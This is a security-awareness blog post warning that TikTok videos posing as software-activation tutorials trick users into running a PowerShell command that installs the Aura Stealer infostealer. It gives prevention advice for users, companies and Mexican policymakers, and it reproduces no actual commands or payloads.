Malware on TikTok: Danger in videos

In recent months, videos have been detected on TikTok that, under the guise of useful tutorials and guides (for example, supposed instructions for activating popular software), induce users to download and run malware.

What exactly do these videos do?

The content appears to be tricks, activators, or quick fixes for programs such as Adobe Premiere, Microsoft 365, or even non-existent packages that promise extra features in streaming services. In reality, the goal is to convince the user to execute a command in the Run window or terminal. That command downloads and installs an infostealer that:

• Extracts passwords saved in browsers.

• Steals session cookies and authentication tokens.

• Accesses cryptocurrency wallets and credentials from other applications.

A specific example of this malicious chain is the use of an installer referred to as ClickFix, which prompts users to execute a malicious command in PowerShell and deploys a stealer known as Aura Stealer. In addition to Aura, ClickFix can download additional software whose actual purpose is not always clear.

It's not new, it's an evolved technique

Deception is not new: since the 2000s, pop-ups and fake virus warnings have been used to scam users. The difference now is the channel and the disguise. Instead of pop-ups, attackers use social platforms and short videos (a format that quickly builds trust) and take advantage of the habit of following step-by-step instructions without verifying their origin.

Why is it so dangerous?

• Videos are persuasive and reach mass audiences.

• Copying and pasting commands is a low-friction action for many users.

• Malware steals credentials that enable impersonation, access to bank accounts or cryptocurrency wallets, and the exfiltration of confidential files.

• Some malware installs additional payloads for unknown purposes, increasing the risk.

What can Mexico learn from this?

Although the cases are detected on global platforms, the risk applies equally in Mexico.

Practical lessons for the country include:

• Intensify awareness campaigns about the risks of executing commands and downloading software from non-official sources.

• Include modules on social media scams in digital education programs in schools and businesses.

• Promote policies in companies to disable the execution of unsigned scripts and reinforce PowerShell control at endpoints.

• Encourage the adoption of endpoint protection and behavioral analysis solutions that detect infostealers.

Practical recommendations (for users and businesses)

• Never run commands or scripts copied from social media without verifying the source.

• Only download software from official websites or authorized stores.

• Enable multi-factor authentication for bank accounts, email, and cloud services.

• Keep browsers and systems up to date; use password managers instead of saving passwords in the browser.

• For companies: apply PowerShell blocking policies for end users, network segmentation, and behavior monitoring.

• Report suspicious videos to the platform and, if there are signs of compromise, change passwords from a clean device and inform the IT department.

Conclusion

The short video format and apparent simplicity of the instructions make platforms such as TikTok an effective vehicle for distributing social engineering techniques that lead to malware infections on TikTok. The best defense is prevention: education, technical policies, and protective measures that reduce the likelihood that a copied command will result in the installation of an information stealer.

At Cyberpeace, we encourage you to stay alert and informed about new cyberattack tactics, such as malware on social media. Digital education and prevention are the most effective tools for protecting your information and keeping your devices secure. Want to learn more about cybersecurity and best practices online? Follow our social media accounts and visit our blog to stay one step ahead of digital threats.

• LinkedIn 

• Facebook 

• Instagram 

• X 

• YouTube